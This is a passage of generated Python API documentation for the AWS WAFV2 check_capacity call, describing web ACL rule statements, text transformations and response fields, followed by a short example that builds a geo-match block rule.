QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . 
The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. 
Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. 
This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. 
The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. 
When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. 
If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . 
This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Capacity': 123
}
Response Structure
(dict) --
Capacity (integer) --
The capacity required by the rules and scope.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
:return: {
'Capacity': 123
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
"""
pass
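# Illustrative sketch (not part of the original module): a minimal
# check_capacity call with a single geo-match rule, using the real boto3
# client. Names and values are placeholders.
def _example_check_capacity():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    response = client.check_capacity(
        Scope='REGIONAL',
        Rules=[
            {
                'Name': 'block-example-countries',
                'Priority': 0,
                'Statement': {
                    'GeoMatchStatement': {
                        'CountryCodes': ['US', 'CN'],
                    },
                },
                'Action': {'Block': {}},
                'VisibilityConfig': {
                    'SampledRequestsEnabled': True,
                    'CloudWatchMetricsEnabled': True,
                    'MetricName': 'blockExampleCountries',
                },
            },
        ],
    )
    print(response['Capacity'])  # WCUs the rule set would consume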
